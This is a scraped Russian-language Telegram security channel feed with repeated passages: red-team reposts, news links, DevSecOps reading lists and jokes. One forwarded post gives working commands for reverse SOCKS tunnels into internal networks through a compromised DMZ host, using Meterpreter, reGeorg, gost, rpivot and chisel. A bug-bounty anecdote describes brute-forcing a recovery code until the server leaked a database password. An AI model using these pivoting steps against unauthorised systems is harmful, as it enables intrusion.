Материал про пентест 1С
Ardent101
Еще 1 раз про пентест 1С
Введение Настоящий материал по большей части состоит из общедоступных наработок других людей. Целью было проверить указанные наработки на практике и собрать получившиеся результаты в одном месте. Именно этим объясняется название статьи.
Продолжу рассуждение…
Продолжу рассуждение…
Forwarded from RedTeam brazzers
Существует много способов построить reverse socks туннель. Давайте рассмотрим 3 самых простых.
- Meterpreter
Строим сессию meterpreter (пусть она будет под номером 1).
Далее запускаем socks сервер use auxiliary/server/socks_proxy и прописываем route в сессию метерпретер:
Возможно кто нибудь из олдов скажет, что этот способ плохой и будь мы в 2020 году - я бы согласился, тогда модуль назывался auxiliary/server/socks4a и работал он из рук вон плохо, но времена меняются.
- reGeorg
Используем инструмент https://github.com/sensepost/reGeorg. Если вы проломили сервер в DMZ, то скорее всего там есть PHP, ASP или JSP приложение. Стоит загрузить соответствующий файл на сервер, запустить у себя клиент - и вот мы через HTTP туннель вылетаем во внутреннюю сеть.
- Gost
Способ которым пользуюсь я сам. Невероятно мощный инструмент https://github.com/ginuerzh/gost, на узле В запускаем gost в интернете:
Инструмент gost очень надёжный и построив один раз туннель можете не переживать, он и через месяц будет работать, как говорится "без единого разрыва!".
Есть и другие инструменты, в том числе и встроенные, например, ssh. Первым шагом на сервер B пробрасываем 22 порт, а потом на сервере B подключаемся в него с опцией -D, но этот способ может быть не всегда удобен.
Есть прекрасная статья https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6 которая вам подробнее расскажет про магию SSH.
Еще есть вариант с помощью инструмента Rpivot(https://github.com/klsecservices/rpivot):
Еще вариант от уважаемого гостя нашего канала (@snovvcrash)
Используя chisel:
Верно ответили на вопрос:
@Lizzmack
@heart1ess
@drakylar
@snovvcrash
#вопросответ
- Meterpreter
Строим сессию meterpreter (пусть она будет под номером 1).
Далее запускаем socks сервер use auxiliary/server/socks_proxy и прописываем route в сессию метерпретер:
route add 192.168.0.0 255.255.0.0 1
Всё, теперь залетая в 127.0.0.1:1080 мы вылетим во внутренней сети(proxychains или tsocks кому как удобнее).Возможно кто нибудь из олдов скажет, что этот способ плохой и будь мы в 2020 году - я бы согласился, тогда модуль назывался auxiliary/server/socks4a и работал он из рук вон плохо, но времена меняются.
- reGeorg
Используем инструмент https://github.com/sensepost/reGeorg. Если вы проломили сервер в DMZ, то скорее всего там есть PHP, ASP или JSP приложение. Стоит загрузить соответствующий файл на сервер, запустить у себя клиент - и вот мы через HTTP туннель вылетаем во внутреннюю сеть.
- Gost
Способ которым пользуюсь я сам. Невероятно мощный инструмент https://github.com/ginuerzh/gost, на узле В запускаем gost в интернете:
gost -L socks5://user:pass@0.0.0.0:1337
На узле А запускаем 2 госта:./gost -L socks5://user:pass@127.0.0.1:13338&
./gost -L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://user:pass@<ip B>:1337&
всё, теперь подключаемся к порту 13381 на узле D и выходим в DMZ. Как бонус мы установили логин/пароль на socks и повесили порт на сервере B в Интернет.Инструмент gost очень надёжный и построив один раз туннель можете не переживать, он и через месяц будет работать, как говорится "без единого разрыва!".
Есть и другие инструменты, в том числе и встроенные, например, ssh. Первым шагом на сервер B пробрасываем 22 порт, а потом на сервере B подключаемся в него с опцией -D, но этот способ может быть не всегда удобен.
Есть прекрасная статья https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6 которая вам подробнее расскажет про магию SSH.
Еще есть вариант с помощью инструмента Rpivot(https://github.com/klsecservices/rpivot):
python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0
Client side:python client.py --server-ip <ip> --server-port 9999
As a result, a socks4 proxy service will be bound server side on port 1080.Еще вариант от уважаемого гостя нашего канала (@snovvcrash)
Используя chisel:
(B) $ ./chisel server -p 1337 --reverse --socks5 --auth hax0r:'Passw0rd!'
(A) $ nohup ./chisel client --fingerprint <FINGERPRINT> --auth hax0r:'Passw0rd!' 8.8.8.8:1337 R:127.0.0.1:1080:socks &
(B) $ proxychains4 -q hacktheplanet.py 10.10.13.37
где 10.10.13.37
- какая-нибудь тачка из внутренней сетиВерно ответили на вопрос:
@Lizzmack
@heart1ess
@drakylar
@snovvcrash
#вопросответ
GitHub
GitHub - sensepost/reGeorg: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and…
The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. - sensepost/reGeorg
Forwarded from Заметки Bug Bounty Hunter'а
Искал медь, а нашёл золото
Решил проверить наличие защиты от перебора кода при восстановлении доступа к аккаунту. Код восстановления состоял из 4 символов. Взял фаззер, по умолчанию выставил 50 одновременных потоков, запустил перебор и не обнаружил никаких rate limit'еров. Время жизни кода было небольшим - всего 60 секунд, а ответ от сервера занимал несколько секунд. При таких условиях времени перебрать все возможные варианты попросту не хватило бы
Выставил 1000 потоков и... забил все доступные слоты для подключения к БД 😬
В результате сервер в теле ответа вернул детали ошибки. В одной из строчек присутствовал пароль от БД в открытом виде 😎
И такое бывает 😁
Решил проверить наличие защиты от перебора кода при восстановлении доступа к аккаунту. Код восстановления состоял из 4 символов. Взял фаззер, по умолчанию выставил 50 одновременных потоков, запустил перебор и не обнаружил никаких rate limit'еров. Время жизни кода было небольшим - всего 60 секунд, а ответ от сервера занимал несколько секунд. При таких условиях времени перебрать все возможные варианты попросту не хватило бы
Выставил 1000 потоков и... забил все доступные слоты для подключения к БД 😬
В результате сервер в теле ответа вернул детали ошибки. В одной из строчек присутствовал пароль от БД в открытом виде 😎
И такое бывает 😁
Опять кому-то сломали лицо пассворд-спреингом, когда не было 2фа (кому-то это майкрософтам)
https://securityaffairs.com/157802/apt/midnight-blizzard-hacked-microsoft-email-accounts.html
https://securityaffairs.com/157802/apt/midnight-blizzard-hacked-microsoft-email-accounts.html
Security Affairs
Russia-linked Midnight Blizzard APT hacked Microsoft corporate emails
Microsoft revealed that the Russia-linked APT Midnight Blizzard has compromised some of its corporate email accounts.
Начинаем серию статей по DevOps и DevSecOps, где поделимся интересными идеями о DevOps в общем, рассмотрим инструменты, облегчающие процесс разработки кода. Но особое внимание уделим DevSecOps и особенностям обеспечения безопасности в разработке.👨💻
Основы😄:
-Зачем вообще внедрять девопс если все это дорого богато, а штрафы за утечки в РФ стоят копейки(там не сильно интересно, но в целом базу зачем надо описывают)
https://youtube.com/watch?v=ywu7osKVZIw&feature=youtu.be
- Позитивы на стендофе, от лозунгов к реализации devsecops
https://youtu.be/BF24NoqU5ZI?si=sEK1JW5lGHLU7W5m
- Мифический человеко-DevOps
https://habr.com/ru/articles/786854/
- Некоторые техники безопасной разработки https://www.chaossearch.io/blog/advanced-devsecops-techniques-audit-logging
- Строим devsecops pipeline на опенсурс инструментах
https://medium.com/@ikbenezer/building-a-devsecops-pipeline-with-open-source-tools-c296b88cf22c
- Архитектура цикла безопасной разработкиздорового человека от microsoft https://learn.microsoft.com/ru-ru/azure/architecture/solution-ideas/articles/devsecops-rolling-branch
- Advanced End-to-End DevSecOps Kubernetes(может понадобиться впн, т.к. medium) https://blog.stackademic.com/advanced-end-to-end-devsecops-kubernetes-three-tier-project-using-aws-eks-argocd-prometheus-fbbfdb956d1a
- Инструменты devsecops, постоянно пополяемый список различных инструментов, заглядываю туда когда надо подобрать нужный инструмент
https://github.com/sottlmarek/DevSecOps
Как все происходит, если не соблюдать🤒:
- Как через Github крупные компании ломают, основные приемы https://securitymedia.org/info/opasnye-svyazi-kak-prestupniki-vzlamyvayut-it-produkty-cherez-github.html
- Почему Rockstar Games и Uber взломаны несмотря на девопс https://www.informationweek.com/software-services/is-it-time-to-rethink-devsecops-after-major-security-breaches-
Интересные канальчики🤠:
•https://t.me/devsecops_weekly
•https://devops.com/category/blogs/devsecops/
Постинг по данной теме можно будет найти по хештегу
#devsecops
Список будет постоянно пополняться
Основы😄:
-Зачем вообще внедрять девопс если все это дорого богато, а штрафы за утечки в РФ стоят копейки(там не сильно интересно, но в целом базу зачем надо описывают)
https://youtube.com/watch?v=ywu7osKVZIw&feature=youtu.be
- Позитивы на стендофе, от лозунгов к реализации devsecops
https://youtu.be/BF24NoqU5ZI?si=sEK1JW5lGHLU7W5m
- Мифический человеко-DevOps
https://habr.com/ru/articles/786854/
- Некоторые техники безопасной разработки https://www.chaossearch.io/blog/advanced-devsecops-techniques-audit-logging
- Строим devsecops pipeline на опенсурс инструментах
https://medium.com/@ikbenezer/building-a-devsecops-pipeline-with-open-source-tools-c296b88cf22c
- Архитектура цикла безопасной разработки
- Advanced End-to-End DevSecOps Kubernetes(может понадобиться впн, т.к. medium) https://blog.stackademic.com/advanced-end-to-end-devsecops-kubernetes-three-tier-project-using-aws-eks-argocd-prometheus-fbbfdb956d1a
- Инструменты devsecops, постоянно пополяемый список различных инструментов, заглядываю туда когда надо подобрать нужный инструмент
https://github.com/sottlmarek/DevSecOps
Как все происходит, если не соблюдать🤒:
- Как через Github крупные компании ломают, основные приемы https://securitymedia.org/info/opasnye-svyazi-kak-prestupniki-vzlamyvayut-it-produkty-cherez-github.html
- Почему Rockstar Games и Uber взломаны несмотря на девопс https://www.informationweek.com/software-services/is-it-time-to-rethink-devsecops-after-major-security-breaches-
Интересные канальчики🤠:
•https://t.me/devsecops_weekly
•https://devops.com/category/blogs/devsecops/
Постинг по данной теме можно будет найти по хештегу
#devsecops
Список будет постоянно пополняться
👍1
Строим devsecops pipeline на коленке opensource тулзах
Ссылка для РФ без впн:
#devsecops
https://medium.com/@ikbenezer/building-a-devsecops-pipeline-with-open-source-tools-c296b88cf22c
Ссылка для РФ без впн:
https://freedium.cfd/https://medium.com/@ikbenezer/building-a-devsecops-pipeline-with-open-source-tools-c296b88cf22c
#devsecops
Medium
Building a DevSecOps Pipeline with Open-Source Tools
A tutorial on how to build a DevSecOps pipeline with open-source tools.
Кстати довольно таки интересный курс по похеку(взлому) active directory, там все основы, также в конце дают сертификат о прохождении лекций.
Несмотря на то что работодатели не ценят прохождение курсиков udemy - для галочки и знаний нормально
https://www.udemy.com/course/active-directory-exploitation-and-lateral-movement-black-box/
#Redteam
Несмотря на то что работодатели не ценят прохождение курсиков udemy - для галочки и знаний нормально
https://www.udemy.com/course/active-directory-exploitation-and-lateral-movement-black-box/
#Redteam
Udemy
Active Directory Exploitation and Lateral Movement BlackBox
Exploiting Kerberos Delegations, Forest Trusts, SQL Server, ACLs, Excessive Users and Groups privilege and Many more
Forwarded from road to OSCP
Атаки на Active Directory без учетных данных
https://hadess.io/pwning-the-domain-credentialess-username/
https://hadess.io/pwning-the-domain-credentialess-username/
Forwarded from road to OSCP
Сборник примеров уязвимого кода на разных языках и способы исправления
https://docs-dev.fluidattacks.com/dquinteroatfluid/criteria/fixes/
https://docs-dev.fluidattacks.com/dquinteroatfluid/criteria/fixes/
road to OSCP
Сборник примеров уязвимого кода на разных языках и способы исправления https://docs-dev.fluidattacks.com/dquinteroatfluid/criteria/fixes/
Довольно интересно, учитывая что я сейчас собираю уязвимые снипетты для создания sast под скан бизнес логики в сурс коде
Члена lockbit допрашивают, слив произошел
https://youtu.be/J-KP82SCRNs?si=s5o0YsEuJ56f8v_E
https://youtu.be/J-KP82SCRNs?si=s5o0YsEuJ56f8v_E
YouTube
Паша Техник в фильме Матрица
Парочка плохих шутеек от жпт(chat gpt) по поводу редтима, решил проверить чувство юмора у нейронки, как у нее получилось судите сами😅
1) Зачем хакеру из красной команды ломать Active Directory, если он может просто спросить пароль у администратора на корпоративной вечеринке?
Потому что на последней вечеринке админ использовал многофакторную аутентификацию: пиво, водка и текила. После этого, даже если хакер и получил бы пароль, вспомнить его уже было бы верхом привилегий!
2)Почему хакер из красной команды прекратил флиртовать с Active Directory?
Потому что когда он предложил зайти поглубже и использовать pass-the-hash, Active Directory ответила: "Ты что, серьёзно? Мне нужен надёжный партнёр, а ты всё время пытаешься перейти к DCSync без предварительных ласк в виде phishing! И да, я заметила, как ты косишься на мои GPOs, мечтая о lateral movement. Нам лучше остаться друзьями... с ограниченными правами!"
3) Хакер из красной команды заявляет на встрече: "Я решил перестать использовать сложные эксплойты для внедрения в сеть. Вместо этого, я начал отправлять IT-отделам письма с угрозами отключить интернет-чайник, если они сами не предоставят мне доступ. Вы не поверите, но эффективность почти 100% - кажется, без утреннего кофе они готовы на все!"
1) Зачем хакеру из красной команды ломать Active Directory, если он может просто спросить пароль у администратора на корпоративной вечеринке?
Потому что на последней вечеринке админ использовал многофакторную аутентификацию: пиво, водка и текила. После этого, даже если хакер и получил бы пароль, вспомнить его уже было бы верхом привилегий!
2)Почему хакер из красной команды прекратил флиртовать с Active Directory?
Потому что когда он предложил зайти поглубже и использовать pass-the-hash, Active Directory ответила: "Ты что, серьёзно? Мне нужен надёжный партнёр, а ты всё время пытаешься перейти к DCSync без предварительных ласк в виде phishing! И да, я заметила, как ты косишься на мои GPOs, мечтая о lateral movement. Нам лучше остаться друзьями... с ограниченными правами!"
3) Хакер из красной команды заявляет на встрече: "Я решил перестать использовать сложные эксплойты для внедрения в сеть. Вместо этого, я начал отправлять IT-отделам письма с угрозами отключить интернет-чайник, если они сами не предоставят мне доступ. Вы не поверите, но эффективность почти 100% - кажется, без утреннего кофе они готовы на все!"
This media is not supported in your browser
VIEW IN TELEGRAM
Сегодня наше хакерское комьюнити хочет поздравить Вас, наших прекрасных женщин, с 8 марта! Пусть ваш код всегда будет эффективным, а ваши алгоритмы - безошибочными. Пусть ваша жизнь будет полна интересных задач и успешных проектов, а ваши планы - безопасны от вирусов. Пусть каждый бит вашего женского кода будет неповторимым и вдохновляющим для всех вокруг! С праздником вас, наши самые ценные ресурсы! 🌹❤️
❤4❤🔥1🤡1